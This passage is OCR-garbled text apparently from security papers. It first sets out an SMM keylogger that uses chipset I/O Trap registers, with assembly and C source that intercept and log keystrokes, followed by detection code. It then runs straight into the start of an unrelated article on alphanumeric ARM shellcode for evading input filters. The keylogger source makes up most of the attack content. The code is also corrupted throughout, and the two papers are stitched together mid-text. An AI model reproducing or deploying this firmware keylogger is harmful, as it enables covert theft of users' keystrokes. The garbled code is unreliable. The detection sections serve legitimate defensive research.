Ox60 read (current scan code) to keyboard interrupt handler in kernel for 
further processing 


We described all steps up to the last, step 6, where SMI keylogger returns 
intercepted data to the OS keyboard interrupt handler. Returning 
intercepted scan code is different in SMM keylogger using I/O Trap 

method than in SMM keylogger using I/O APIC. If APIC is used to trigger 
SMI (as in [smm_rkt]), SMI keylogger has to re-inject intercepted scan 
code because it has to be later read by OS keyboard interrupt handler. 


On the other side, SMM keylogger that uses I/O Trap method to intercept 
keystrokes traps "IN al, 0x60" instruction executed by OS keyboard 
interrupt handler. This IN instruction cannot be restarted upon resuming 
from SMM as it would cause an infinite loop of SMI traps. Instead, SMI 
handler has to return result of IN instruction in AL/AX/EAX register as if 
IN instruction wasn’t trapped at all. 


EAX register is saved in SMM Save State Map in SMRAM at an offset Ox7FDO 
from SMBASE + 0x8000 in IA-32 [intel_man] or at an offset Ox7F5C in IA-64. 
So to return correct result of IN instruction our SMI keylogger will need 
to update EAX field with scan code read from port 0x60. Obviously, it 
should update EAX only in case if SMI# is IO_SMI as described above in 
this section. 


Let’s modify the above snippet and add the code updating EAX: 


; verify that this is IO_SMI due to read to 0x60 port 
; then update EAX in SMM state save area (SMBASE + 0x8000 + Ox7FDO) 


mov esi, SMBASE 
mov ecx, dword ptr fs:[esi + OxFFA4] 
cmp ecx, 0x00600013 

jnz _not_io_smi 

mov byte ptr fs:[esi + OxFFDO], al 
_not_io_smi: 

; skip this SMI# 


For the sake of completeness, below we provide a snippet that re-injects 
scan code into keyboard controller buffer which would be used by SMM 
keylogger based on IRQ1 to SMI# APIC redirection: 


; read scan code from keyboard controller buffer 
in al, 0x60 
push ax 
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; write command byte O0xD2 to command port 0x64 

; to re-inject intercepted scan code into keyboard controller buffer 
; so that OS keyboard interrupt can read and display it later 

mov al, Oxd2 

out 0x64, al 
; wait until keyboard controller is ready to read 
_wait: 

in al, 0x64 

test al, 0x2 

jnz _wait 

; re-inject scan code 

pop ax 

out 0x60, al 


We described all steps of I/O Trap feature. The next section describes how 
I/O Trap feature can be enabled for SMI keystroke logger to work. 


--[ 3.2 - Programming I/O Trap to capture keystrokes 


To enable and program I/O Trap mechanism we need to consult with chipset 
specifications. For example, Intel(r) I/O Controller Hub 10 (ICH10) Family 
datasheet [ich] specifies 4 registers IOTRO - IOTR3 that can provide 
capability to trap access to I/O ports. 


IOTRn - I/O Trap Register (0-3) 

Offset Address: 1E80-1E87h Register 0 
1E88-1E8Fh Register 1 
1E90-1E97h Register 2 
1E98-1E9Fh Register 3 


Attribute: R/W 


"These registers are used to specify the set of I/O cycles to be trapped 
and to enable this functionality." 


All I/O Trap registers are located in Root Complex Base Address Register 
(RCBA) space in ICH. Please refer to sections 10.1.46-49 of [ich] for 
details of I/O Trap registers. 


- I/O Trap 0-3 (IOTRn) registers are at the offsets 0x1E80 through 0x1E9F 

from RCBA. 

-— Trap Status Register (TRST) is at offset 1E00h from RCBA. Contains 4 

status bits indicating that access was trapped by one of IOTRn traps. 

-— Trapped Cycle Register (TRCR) is at offset 1E10h from RCBA. This 
register contains data written to trapped I/O port. It’s not used when 
trapping read cycles. 


RCBA value can be read from ICH PCI configuration register B:D:F = 0:31:0, 
offset OxFO. 


// 
// Read the Root Complex Base Address Register (RCBA) 


// 


// LPC device in ICH, B:D:F = 0:31:0 
lpc_rcba_addr = pci_addr( 0, 31, 0, LPC_RCBA_R 
_outpd( Oxcf8, lpc_rcba_addr ); 

rcba_reg = _inpd( Oxcfc ); 

pa.LowPart = rcba_reg & Oxffffc000; 


eal 
9) 

— 

s 


// 0x2000 is enough to access I/O Trap range 
rcba = MmMaploSpace( pa, 0x2000, MmCached ); 


Each IOTRn register contains the following important bits that we’1ll need 
to use: 
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Bit 0 Trap and SMI# Enable (TRSE) 
0 = Trapping and SMI# logic disabled. 
1 = The trapping logic specified in this register is enabled. 


Bits 15:2 I/0 Address[15:2] (IOAD) 
dword-aligned address 


Bits 35:32 Byte Enables (TBE) 
Active-high dword-aligned byt nables. 


Bit 48 Read/Write# (RWIO) 


0 = Write 
1 = Read 


NOTE: The value in this field does not matter if bit 49 is set. 


To enable trapping read accesses to keyboard controller data port 0x60 one 

of IOTRn registers (for example, IOTRO) have to be programmed as follows: 

— lower DWORD of IOTRO should be programmed to value 0x61 (IOAD = 0x60, 

TRSE = 1) 

— higher DWORD of IOTRO should be programmed to value 0x100f0 (TBE = Oxf, 
RWIO = 1) 


A snippet of code that programs IOTRO looks as follows: 


// 
// Program I/O Trap to trap on every read from 
// keyboard controller data port 0x60 


// 
pIOTRO_LO = (DWORD *) (rcba + RCBA_IOTRO_LO) ; 
pIOTRO_HI = (DWORD *) (rcba + RCBA_IOTRO_HI); 


// trap on port read + all byte enables 

* (DWORD*) pIOTRO_HI = Ox100f0; 

// keyboard controller port 0x60 + 1 enable I/O Trap 
* (DWORD*) pIOTRO_LO = 0x61; 


For a complete source code please refer to the end of the paper. 


In the next section we will describe full implementation of I/O Trap SMI 
handler used to trap on keyboard interrupts. 


Here we need to note the following. I/O Trap SMI handler needs to disable 
I/O Trap at the beginning of SMI handler and re-enable I/O Trap upon 
resuming from SMM. I/O Trap SMI handler should include these instructions: 


; I/O Trap Register 0 = RCBA + 1E80h 
IO_TRAP_IOTRO_REG equ FEDIDE80h 


mov edx, IO_TRAP_IOTRO_REG 
mov dword ptr [edx], 0 


; handle I/O Trap SMI 


eal 
(9) 


mov edx, IO_TRAP_IOTRO_R 
mov eax, Ox6él 
mov dword ptr [edx], eax 


The above code first disables SMI I/O Trap by writing 0 to FEDIDE80h MMIO 

address (I/O Trap Register 0 = RCBA + 1E80h) and then after handling SMI, 

writes 0x61 value to this register to re-enable I/O trap on read access to 
port 0x60. 


At this point we should have everything we need to modify SMI handler and 
add a keystroke logger payload into SMM. 
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--[ 3.3 - System Management Mode keylogger 


First thing to understand about SMI based keylogger is that it executes 
in the specific environment set up by BIOS and SMI code. Despite that the 
keylogger has similarities with kernel keylogger, it has a lot of SMI 
specifics. 


We tested described keylogger mechanism with only PS/2 keyboards. 


We’1ll be designing SMI keylogger to directly query keyboard controller 
data port 0x60 and read scan codes sent as interrupts when user presses or 
releases any key on a keyboard. 


Keyloggers that directly read port 0x60 typically need to re-inject read 
scan code back to keyboard controller buffer using the same data port 0x60 
such that software up in the stack can read and process this scan code 
without noticing that it was intercepted by the keylogger. 


In this paper we use I/O Trap mechanism to trigger SMI keylogger payload. 
I/O Trap mechanism does not require re-injecting scan codes. This will be 
explained later. Furthermore, keylogger will not work if it re-injects 
scan code. 


Below we provide an assembly of SMI keystroke logger payload based on I/O 
Trap method. It reads scan codes and dumps them to some physical address 
from where they can be extracted later. A complete code of SMI handler 
implementing I/O Trap based SMI keylogger will be provided in the next 
section. 


pusha 


; verify that this is IO_SMI due to read to 0x60 port 


mov esi, SMBASE 
mov ecx, dGword ptr [esi + OxFFA4] 
cmp ecx, 0x00600013 

jnz _not_io_smi 


7 

; read scan code from keyboard controller port 0x60 
7 

xOr ax, ax 

in al, 60h 


7 
; log intercepted scan code (to LOG_BUFFER_PHYS_ADDR physical address) 
; the first dword is a number of scan code bytes saved in the buffer 


, 

mov edi, DST _BUF_PHYSADDR 

mov ecx, dword ptr [edi] 

push edi 

lea edi, dword ptr [edi + ecx + 4] 
mov byte ptr [edi], al 


, 

; increment number of scan code bytes saved in the buffer 
, 

inc ecx 

pop edi 

mov dword ptr [edi], ecx 


7 
; update EAX field in SMM state save map (SMBASE + 0x8000 + SMM _MAP_EAX) 
; with scan code to be returned as a result of trapped IN instruction 
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mov byte ptr [esi + OxFFDO], al 

_not_io_smi: 

popa 


The next section provides full description of SMI handler that implements 
functions of SMM keylogger based on I/O Trap keystroke interception method. 


--[ 3.4 - I/O Trap based keystroke logger SMI handler 


From the description in the previous sections I/O Trap method works like 
this: 


1. CPU issues read or write to some I/O port. 


2. Chipset traps this access, decodes port number and width, read vs. 
write access and consults to I/O Trap registers programmed by kernel mode 
software. 


3. If I/O port access corresponds to programmed in I/O Trap registers, 
chipset asserts SMI# of the CPU. 


4. CPU enters System Management Mode an jumps to SMI handler that claims 
ownership of I/O Trap SMI. 


The way to use I/O Trap mechanism to log keystrokes entered on target 
system is to program chipset to trap on read to keyboard controller data 
port 0x60 and issue SMI# which will invoke SMI handler that will log scan 
code read from port 0x60. 


Once invoked, after read to port 0x60 was trapped, SMI keylogger should 
take the following actions: 


1. Determine if SMI is due to an I/O Trap on read access to keyboard 
controller port. 


2. Clear I/O Trap status bit in TRST MMIO register at address OxFEDIDEOO. 


3. Temporarily disable I/O Trap by clearing IOTRn register at OxFEDI1DE80, 
because later it will need to read from the trapped port. 


4. Check in TRCR MMIO register at OxFEDIDE10 whether read or write to port 
was trapped. 


5. Read scan code from keyboard controller port 0x60 and store it somewhere 
in the keystroke log buffer to extract later or transmit it over the 
network. 


4. Update saved EAX register in SMM state save area with read scan code 
such that when SMI resumes to protected mode, correct scan code is 
returned to interrupted instructions in kernel keyboard interrupt handler 
routine. 


5. Re-enable I/O Trap on read access to keyboard controller port 0x60 by 
writing 0x61 to IOTRn register to enable trapping for the next keystroke 
after resuming from SMM to normal OS execution. 


6. Return from SMI handler code indicating to main SMI dispatch function 
that SMI was claimed and handled. 


OFA LEE EES EA LOE LA LE EME ALE ED EEE EEE FE EE LEE EES EEL EEA ELE EEL EE DAS INE 
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CF FU OTE Fk FR RF Fo Fo ROR ET FRE RE OE Fo OE Fk FR RR Tl Fe ROT EI ok 


; I/O Trap registers in Root Complex Bas 


f 


IO_TRAP_IOTRO_REG equ FEDIDE80h 
TO_TRAP_TRSR_REG equ FEDIDEOOh 
IO_TRAP_TRCR_REG equ FEDIDE10h 
KBRD_DATA_PORT equ 60h 
DST_BUF_PHYSADDR equ 20000h 
SEG_4G equ ? 

; 

; IO_SMI bit, I/O Port = 0x60 

; I/O Type = IN DX 

; I/O Length = 1 


; should all 


’ 
IOSMI_IN_60_BYT 


a 


; SMM Save State 


be checked separately 


Gl 


rs 


1’ 
SMM_MAP_TO_STATE_INFO equ 


SMM_MAP_ FAX 


equ 


Map fields 


00600013h 


FFA4hH 
equ FFDOh 


1’ 


a 


Address (RCBA) 


I/O Trap Register 0 = RCBA + 1E8 


Trap Status Register = RCBA + 1 
Trapped Cycle Register = RCBA + 


any physical address read later 
depends on BIOS 


; we need to load DS with index of 4G O0-based data segment in GDT 
; to be able to access any MMIO 
; or physical addresses for logging scan codes 


push ds 
push SEG_4G 
pop ds 


, 
; clear I/O 7 


¥. 


[Trap status bit 


mov eax, I0_1 


TRAP_TRSR_REG 
mov dword ptr [eax], l 


; check TRCR if it’s IO read or write 
ly reads here 


; we trap onl 


’ 


mov eax, I0_1 


bswap ebx 
and bh, Oxf 
and bl, Oxl1 


TRAP_TRCR_REG 
mov ebx, dword ptr [eax] 


jz _smi_handled 


1’ 


; temporarily disabl 


ca 


mov eax, IO_TRAP_IOTRO_R 


mov dword ptr [eax], 0 


| a ioe, a Mee Se SS ee Se 


EG 
Ei 


; keystroke logging goes here 


FFE FEE IS ETE 


pusha 


le I/O Trap 
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7 

; verify that this is IO_SMI due to read to 0x60 port 
7 

mov esi, SMBASE 
mov ecx, dword ptr [esi + SMM _MAP_IO_STATE_INFO] 
cmp ecx, IOSMI_IN_60_BYTE 
jnz _not_io_smi 


7 

; read scan code from keyboard controller port 0x60 
7 

xOr ax, ax 

in al, KBRD_DATA_PORT 


7 
; log intercepted scan code (to LOG_BUFFER_PHYS_ADDR physical address) 
; the first dword is a number of scan code bytes saved in the buffer 


f. 

mov edi, DST _BUF_PHYSADDR 

mov ecx, dword ptr [edi] 

push edi 

lea edi, dword ptr [edi + ecx + 4] 
mov byte ptr [edi], al 


a 

; increment number of scan code bytes saved in the buffer 
7 

inc ecx 

pop edi 

mov dword ptr [edi], ecx 


7 
; update EAX field in SMM state save map (SMBASE + 0x8000 + SMM _MAP_EAX) 
; with scan code to be returned as a result of trapped IN instruction 


a 


mov byte ptr [esi + SMM_MAP_FAX], al 


_not_io_smi: 


FOR IOE FLA AS FE 


7 

; re-enable I/O Trap on read from port 0x60 
7 
mov eax, IO_TRAP_IOTRO_REG 
mov ebx, KBRD_DATA_PORT+1 
mov dword ptr [eax], ebx 


7 
; return O indicating that SMI was handled 
7 


_smi_handled: 


pop ds 
mov eax, O 
retf 


Above listing intentionally lacks one detail needed for this SMI handler 
to function correctly in ASUS/AMI BIOS to prevent from copy-pasting it. 
A bit more debugging should be sufficient to figure it out. 


--[ 3.5 - Multi-processor keylogger specifics 
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We’ve seen in the previous section that I/O Trap based SMM keylogger has 
(RAX) register in SMM Save State Map so that the 


to update saved 
processor coul 


In case of mul 


EAX 
ld return it as a result of trapped IN instruction. 


lti processor system multiple logical processors may enter 


SMM at the same time so they need their own SMM Save State Map allocated 


in SMRAM. 


This is typical] 


y solved by setting SMRAM base address (SMBASE) 


to a different value for each processor by the BIOS firmware (this is 
to as "SMBASE relocation"). 


referred 


For example, in dual processor system, 


SMBASE = 


SMM Save 
(SMBASEO 


EIP = SMBAS 


one logical processor may have 


SMBASEO and another processor may have SMBASE = SMBASEO + 0x300. 
In this case, the first processor starts executing SMI handler code at 


State Map 
+ 0x8000 + 


EO + 0x8000 and the second at 
areas for both processors will start at 


EIP = SMBASEO + 0x8000 + 0x300. 


Ox7F00) and (SMBASEO + 0x8000 + Ox7FOO + 0x300). 


+ SMBASE 
III T// 
+ SMBAS!I 


5 


+ SMBASE 


+ SMBAS 


al 


Instead of 0x300, 


+ Processor 0 


2 
Sa 


The following simple diagram illustrates SMRAM layout for 2 processors: 


+ OxFFFF 


+t SMBASE + OxFFFF + 0x300 


+t SMBASE + OxFFOO + 0x300 


/ SMM Save 
+ OxFFOO 


Sate area /////////// 


SMI Handler entry point 


+ SMBASE + 0x8000 + 0x300 


+ 0x8000 


SMRAM start 


+t SMBASE + 0x300 


Processor 1 


///////// SMM Save Sate area /////////// 


SMI Handler entry point 


5 


SMRAM start 


3 


for all processors. 


BIOS may choose any offset to use to increment SMBASE 


ay 


There is an easy way to determine it. SMM Save State 
Map should contain SMM Revision Identifier Field at Ox7EFC offset of 


SMBASE+0x8000 which should have the same value for each processor that 


entered SMM. For example, SMM Revision ID may be 0x30100. SMI handler can 
lue of SMM Revision ID in SMRAM. An address of the 
ld minus address of the current SMM Revision ID 

ld be added to SMBASE to calculate SMBAS 


search for the same val 
next SMM Revision ID fiel 
field gives the offset that shoul 
of the next processor. 


Below we demonstrate how SMM key] 
section could have been modified 
checks if I/O State Field has val 


each processor and, 


Map: 


dl 
7 update 
, 
mov esi, 
lea ecx, 
cmp e€Cx, 


Gl 


logger handler provided in the previous 
to support dual processor. The code below 
lue matching to the correct I/O Trap for 


if so, updates EAX of this processor in SMM Save State 


saved EAX registers in SMM state save maps of 2 processors 


SMBASE 
adword ptr 


IOSMI_IN_60_BYTE 


[esi + SMM_MAP_IO_STATI 


G 


INFO] 
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jne _skip_procd: 
mov byte ptr [esi + SMM_MAP_FAX], al 


_skip_procod: 
lea ecx, dword ptr [esi + SMM MAP_IO_STATE_INFO + 0x300] 
cmp ecx, IOSMI_IN_60_BYTE 
jne _skip_procl: 
mov byte ptr [esi + SMM _MAP_EAX + 0x300], al 


_skip_procl: 


--[ 4 - SUGGESTED DETECTION METHODS 


--[ 4.1 - Detecting I/O Trap based SMM keylogger 


Generally, as pointed in previous research, Operating System does not have 
access to SMRAM as soon as it’s locked by BIOS firmware. So detecting 
malicious code inside SMRAM becomes a challenging task for the OS or 
anti-virus software. 


In many cases, however, it is not necessary to inspect SMRAM to detect the 
presence of SMM rootkit. Let’s explain this thesis on keylogger exampl 
described earlier. 


To be able to intercept pressed keystrokes SMM keystroke logger has to 
modify hardware configuration in a certain way. In case of using I/O Trap 
method SMM keylogger has to enable I/O Trap to trap on IN/OUT instructions 
to keyboard controller ports 0x60 and 0x64. 


In case of using I/O APIC technique SMM keylogger has to change I/O APIC 
Redirection Table to program SMI# as a delivery mode of hardware interrupt 
IRQ #01, as pointed in [smm_rkt]. 


As usual we’ll focus on I/O Trap based SMM keylogger. If there is no 
legitimate port 0x60/0x64 emulation used and I/O Trap is enabled to trap 
on keyboard ports then this is a clear indication of SMM keylogger. So to 
detect this keylogger we need to detect that I/O Trap has been programmed 
to trap on access to keyboard controller I/O ports 0x60 and 0x64. 


For example, the snippet below detects that I/O Trap is programmed to trap 
on reads from port 0x60: 


pIOTRO_LO = (DWORD *) (rcba + RCBA_IOTRO_LO); 


// keyboard controller port 0x60 + 1 enable I/O Trap 
1£(0x61 == (* (DWORD*)pIOTRO_LO)) { 
DbgPrint ("SMM keylogger detected. 
Found enabled I/O Trap on keyboard port 60h\n"); 


} 


If I/O Trap is detected it’s trivial to disable it. We simply need to 
write 0x0 to IOTRO register. 


--[ 4.2 - General timing based detection 


Another possible method to detect I/O Trap based SMM keylogger is to 
measure timing difference between IN/OUT instructions that access keyboard 
controller ports vs. other I/O ports. As access to some or all keyboard 
ports is trapped by SMI handler then it will take (much) longer to return 
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results of IN/OUT instructions. For example, profiling "IN 60h" could be 


RDTSC 
IN AL, 60H 
RDTSC 


It should be noted that all variants of IN instruction should be profiled 
like "IN AL, 60H", "IN AX, DX" etc., because I/O Trap may be programmed to 


intercept only certain variants. 


--[ 5 - CONCLUSION 


This work described details of how SMI handlers are implemented in BIOS 
system firmware and how to disassemble and modify them. The authors hope 
that this paper added some clarity to how malware could use SMI handlers 
to add rootkit functionality in SMM and, more importantly, how to detect 


such stealthy malware. 


It would be naive to assume that SMM is secure as long as BIOS firmware 


"locks down" SMM memory by setting D_LCK bit in SMRAMC register (origina 
attack from [smm]). Other vulnerabilities already found in SMM protections 


as demonstrated in [xen_Own]. 


SMI handlers may also change from BIOS to BIOS, may be updated with the 


rest of BIOS firmware using BIOS update 
motherboards, may be extended with lots 
security features [xen_Own]). Migration 
firmware development and may cause even 


to EFI SMI handlers in SMM. Additional 


mechanism available for all 
of new features (even with new 
to (U)EFI will simplify EFI 
more functionality to be added 


ly, SMI handlers should interact 


with unprotected OS and drivers. The bottom line is that we believe th 
nerabilities in SMI handlers’ code 
Similarly to vulnerabilities in OS kernel, drivers and applications. BIOS 
vendors should start paying better attention to what they are putting 


main danger will come from software vu 


into the SMM. 


--[ 6 -— SOURCE CODE 


--[ 6.1 - System Management Mode keylogger that uses I/O Trap mechanism 


PLE EEL EEE LEE SE EA ELAS FEL AEE EEE SE EAE EASE FEL AEE LEE ELA ERAS FELLATE LT 


+; I/O Trap based SMI keystroke logger 


PEED EOF Ek EEE PE Ee EE EOE EE EE Pk EE PE Bh OF EE EE POE RA EE EO OF EE 


; I/O Trap registers in Root Complex Base Address (RCBA) 


f 


IO_TRAP_IOTRO_REG equ FEDIDE80h 


TO_TRAP_TRSR_REG equ FEDIDEOOh 
TO_TRAP_TRCR_REG equ FEDIDE10h 
KBRD_DATA_PORT equ 60h 
DST_BUF_PHYSADDR equ 20000h 
SEG_4G equ ? 


; IO_SMI bit, I/O Port = 0x60 
; I/O Type = IN DX 
; I/O Length = 1 


1’ 


, 


I/O Trap Register 0 = RCBA + 1E8 
Trap Status Register = RCBA + II 
Trapped Cycle Register = RCBA + 


any physical address read later 
depends on BIOS 


1 
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; Should all be checked separately 


1, 
IOSMI_IN_60_BYTI 


GJ 


equ 00600013h 


Ca 


; SMM Save State Map fields 


’ 
SMM _MAP_TO_STATE_INFO equ FFA4h 
SMM_MAP_ FAX equ FFDOh 


23 


; we need to load DS with index of 4G O0-based data segment in GDT 
; to be able to access any MMIO 

; or physical addresses for logging scan codes 

1, 
push ds 
push SEG_4G 
pop ds 


, 

; clear I/O Trap status bit 
, 
mov eax, IO_TRAP_TRSR_REG 
mov dword ptr [eax], l 


; check TRCR if it’s IO read or write 
; we trap only reads here 

La 
mov eax, IO_TRAP_TRCR_REG 
mov ebx, dword ptr [eax] 
bswap ebx 

and bh, Oxf 

and bl, Oxl1 

jz _smi_handled 


r 

; temporarily disable I/O Trap 
, 
mov eax, IO_TRAP_IOTRO_REG 
mov dword ptr [eax], 0 


|e Soe Sar es ae See Se Mee de ed 


; keystroke logging goes here 


Fi DL EDIE FOES SE. 


pusha 


7 

; verify that this is IO_SMI due to read to 0x60 port 
7 

mov esi, SMBASE 
mov ecx, dword ptr [esi + SMM _MAP_IO_STATE_INFO] 
cmp ecx, IOSMI_IN_60_BYTE 
jnz _not_io_smi 


5 


7 

; read scan code from keyboard controller port 0x60 
7 

xOr ax, ax 

in al, KBRD_DATA_PORT 


7 
; log intercepted scan code (to LOG_BUFFER_PHYS_ADDR physical address) 
; the first dword is a number of scan code bytes saved in the buffer 


, 
mov edi, DST _BUF_PHYSADDR 
mov ecx, dword ptr [edi] 
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push edi 
lea edi, dword ptr [edi + ecx + 4] 
mov byte ptr [edi], al 


3 

; increment number of scan code bytes saved in the buffer 
r 

inc ecx 

pop edi 

mov dword ptr [edi], ecx 


; update EAX field in SMM state save map (SMBASE + 0x8000 + SMM _MAP_EAX) 
; with scan code to be returned as a result of trapped IN instruction 


7’ 


mov byte ptr [esi + SMM_MAP_FAX], al 


_not_io_smi: 


Le dae ee dae de Ae fea SO de SA 


7 

; re-enable I/O Trap on read from port 0x60 
7 
mov eax, IO_TRAP_IOTRO_REG 
mov ebx, KBRD_DATA_PORT+1 
mov dword ptr [eax], ebx 


7 
; return O indicating that SMI was handled 
7 


_smi_handled: 
pop ds 


mov eax, 0 
retf 


-—-[ 6.2 — Programming I/O Trap 


define LPC_RCBA_REG OxFO 


define RCBA_IOTRO_LO Ox1lE80 // I/O Trap 0 Register (IOTRO) low dword 
define RCBA_IOTRO_HI Ox1lE84 // I/O Trap 0 Register (IOTRO) high dword 


define pci_addr (bus, dev, fn, reg) 
(Ox80000000 | 

(bus & Oxff) << 16) | 

(dev & Oxl1lf) << 11) | 

(fn & 7) << 8) | 

reg & Oxfc)) 


ET WF AEG ORE 


( 
( 
( 
( 


void _set_keystroke_io_trap() 

{ 
unsigned long lpc_rcba_addr; 
unsigned long rcba_reg; 
void *rcba; 


DWORD * pIOTRO_LO; 
DWORD * pIOTRO_HI; 


// 
// Read the Root Complex Base Address Register (RCBA) 
// 


11. 


a 
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// LPC device in ICH, B:D:F: = 0:31:0 


lpc_rcba_addr = pci_addr(0, 31, 0, LPC_RCBA_R 


rcba_reg = 
pa.LowPart 


eal 
9) 

L 

~ 


_outpd(O0xcf8, lpc_rcba_addr) ; 


inpd(O0xcfc) ; 


= rceba_reg & Oxffffc000; 
DbgPrint ("RCBA base physical address: 0x%08x\n", pa.LowPart); 


// 0x2000 is enough to access I/O Trap range 
rcba = MmMaploSpace(pa, 0x2000, MmCached) ; 


// 


// Program I/O Trap to trap on every read from 
// keyboard controller data port 0x60 


pIOTRO_LO 
pIOTRO_HI 


a 


DWORD *) (rcba + RCBA_IOTRO_LO); 
DWORD *) (rcba + RCBA_IOTRO_HI); 


ma 


// trap on port read + all byte enables 

* (DWORD*) pIOTRO_HI = Ox100f0; 

// keyboard controller port 0x60 + 1 enable I/O Trap 

* (DWORD*) pIOTRO_LO = 0x61; 

DbgPrint ("IOTRO = 0x%08x%08x at O0x%08x\n", 

*pIOTRO_HI, *pIOTRO_LO, (pa.LowPart + RCBA_IOTRO_LO)); 


6.3 - Detecting I/O Trap SMI keystroke logger 


void _detect_keystroke_io_trap () 


{ 


unsigned 
unsigned 


void *rcba; 


DWORD * pIO1 


long lpc_rcba_addr; 
long rcba_reg; 


[TRO_LO; 


DWORD * pIOTRO_HI; 

// 

// Read the Root Complex Base Address Register (RCBA) 
// 

// LPC device in ICH, B:D:F: = 0:31:0 


lpc_rcba_addr = pci_addr(0, 31, 0, LPC_RCBA_R 


eal 
9) 

LS 

~e 


_outpd(O0xcf8, lpc_rcba_addr) ; 
rcba_reg = 
pa.LowPart 


= rcba_reg & Oxffffc000; 


inpd(Oxcfc) ; 


// 0x2000 is enough to access I/O Trap range 
rcba = MmMaploSpace(pa, 0x2000, MmCached) ; 


pIol 
pIol 


TRO_LO 
TRO_HI 


// keyboard 
i1f(0x61l == 


{ 


(DWORD *) (rcba + RCBA_IOTRO_LO) ; 
(DWORD *) (rcba + RCBA_IOTRO_HI); 


controller port 0x60 + 1 enable I/O Trap 
(* (DWORD*) pIOTRO_LO) ) 


DbgPrint ("SMM keylogger detected. 


Found enabled I/O Trap on keyboard data port 60h\n"); 


// Disable I/O Trap SMM keylogger 
// clear low dword of IOTRn register 
* (DWORD*) pIOTRO_LO = 0; 
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A.- Shellcode Appendix 
A.0 - Writable Memory 


A.1 - Example Shellcode 
A.2 - Resulting Bytes 
--[ 0.- Introduction 


With the sudden explosion of mobile devices, the ARM processor has 
become one of the most widespread CPU cores in the world. ARM 
processors offer a good trade-off between power usage and 
processing power, which makes it an excellent candidate for mobile 
and embedded devices. Most mobile phones and personal digital 
assistants feature an ARM processor. 


Only recently, however, these devices have become powerful enough 
to let users connect over the internet to various services, and to 
share information like we are used to on desktop PCs. Unfortunately, 
this introduces a number of security risks. 


Like PCs, native ARM applications are susceptible to attacks such 

as buffer overflows and other improper input validation abuse. Since 
up till recently only fully featured desktop computers were powerful 
enough to connect to the internet and disseminate information ina 
ubiquitous manner, most attacks have focussed on the dominant desktop 
processor, which is the x86 processor. 


Given the increased connectivity of ARM-based devices, and given the 
potential for misuse of these devices (for instance, by making a 
hacked phone call commercial numbers), attacks on these devices will 
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become much more common than is now the case. 


A typical hurdle for exploit writers, is that the shellcode has to 
pass one or more filtering methods before reaching the vulnerable 
buffer. A filtering method is a method that does some simple input 
validation, for instance by stringently checking that input matches 
a particular predefined pattern. A popular regular expression for 
example is [a-zA-Z0-9] (possibly extended with "space"). Intrusion 
detection systems are also adding more checks to detect particular 
patterns of op codes to detect attacks against applications. 


For educational purposes, we describe in this article how to write 
alphanumeric shellcode for ARM. This is important, because alphanumeric 
strings typically pass more of these validation checks and tend to 
survive more data transformations (such as conversions from one 
encoding to another) than non-alphanumeric shellcode. Writing 
alphanumeric shellcode was not considered easily doable on RISC 
architectures, which use 4 byte instructions. 


When we discuss the bits in a byte we will use the following 
representation: the most significant bit is bit 7 and the least 
Significant bit is bit O in our discussion. The first byte of an 
instruction is bit 31 to 24 and the last byte is bit 7 to 0. 


--[{ 1.- The ARM architecture 


----[ 1.0 The ARM Processor 


The ARM architecture is a 32-bit RISC architecture with 16 general 
purpose registers available to regular programs and a status 
register (actually there are more general purpose registers and 
status registers but those are only used in exception modes and not 
important for our discussion). Every instruction is 4 bytes long so 
we must ensure that all 4 of these bytes are alphanumeric. This is 
very different from the x86 architecture which has variable length 
instructions. As a result, getting instructions to be completely 
alphanumeric is harder on ARM than on x86. 


Registers RO to R12 are real general purpose registers that do not 
have a dedicated purpose. Register R13 is used as a stack pointer 
and can also be referred to as register SP. Register R14 is used as 
the link register and is also referred to as LR. It contains the 
return address for functions and exceptions. Register R15 contains 
the current program counter and is also referred to as PC. Unlike 
x86 architectures, we can directly read and write this register. 
Reading from this register will return the currently executing 
instruction + 8 bytes in ARM mode or the current instruction + 4 
bytes in Thumb mode (see section 1.5). Writing to this register 
causes execution to continue at this address. 


A[31:0] 
/\ 
| ALE | | ABE | 
|| | lal | | | 
\/ V | | ve \/ i 
n 
Address Register C 
r 
S | | e 
f-% | | m 
|P | \/ e 
|C| n 
| Address fo |e 
| |b| Incrementer|__ + + 
|| Ju | r | Scan 
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\/ Isl | | Control 
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b 32x8 <- MCLK 
u A|<=>|Multiplier|<=>|b <- nWAIT 
Ss u —-> nRW 
b s Instruction|-> MAS[1:0] 
u | Decoder <- nIROQ 
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Logic <- ABORT 
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\ / | | -—> SEQ 
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== See -> nCPI 
\32-bit ALU/ <-— CPA 
-—--------- <- CPB 
| —-> nM[4:0] 
| <- TBE 
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| | /\ 7X 
\/ | | | | 
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& Read Data Register 


[i ae | & Thumb Instruction Decoder 
vi | || 
nENOUT | nENIN || /\ 
| | | | | 
DBE | | 
| | 
\/ 
D[31:0] 


There are many versions of the ARM processor, with version 6 adding 
a large amount of new instructions. In this paper we try to remain 
as broad as possible: our alphanumeric ARM shellcode should work on 
all versions of the ARM processor. To this end, we will drop all 
instructions that require a specific version of a processor. 
However, we clearly note which instructions are dropped because they 
are not alphanumeric and which instructions are dropped because of 
compatibility constraints. This allows a shellcode writer who only 
needs compatibility with a specific processor version to take 
advantage of the extra instructions that may be available in that 
processor. 


----[ 1.1 Coprocessors 


ARM processors can be extended with a number of coprocessors to 
perform non-standard calculations and to avoid having to do these 
calculations in software. ARM supports up to 16 coprocessors, each 
of which has a unique identification number. Some processors might 
need more than one identification number, in order to accommodate 
large instruction sets. Coprocessors are available for memory 
management, floating point operations, debugging, media, 
cryptography, 
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When an ARM processor encounters an instruction it cannot process, 
it sends the instruction out on the coprocessor bus. If a 
coprocessor recognizes the instruction, it can execute it and 
respond to the main processor. If none of the coprocessors respond, 
an ‘illegal instruction’ exception is raised. 


----[ 1.2 Addressing Modes 


ARM has different addressing modes. We’1ll briefly discuss the 
different addressing modes which are useful for writing our 
shellcode. 


----[ 1.2.0 Addressing modes for data processing 


Most instructions will look like this: 
<opcode>{<cond>}{S} <Rd>, <Rn>, <shifter_operand> 
For example: 
ADDEQ r0O, rl, #20 


The shifter_operand is the third argument to an instruction. It 

is 12 bits large and can be one of the following 11 possibilities. 
When a <shift_imm> is specified below, this is an immediate that 

is 4 bits large, meaning that it can be any value in the range of 0 
E06: 3.1. 


1. #immediate An immediate of 8 bits can be used as shifter 
operand. The 8 bits immediate can optionally be rotated right by a 
shift_imm. 

2. <Rm> A register can be used as an argument. 

3. <Rm>, LSL #<shift_imm> A register, which is logically shifted 
left a shift_imm. 

4. <Rm>, LSL <Rs> A register Rm is used as argument that is shifted 
left by a second register Rs. 

5. <Rm>, LSR #<shift_imm> A register, which is logically shifted 
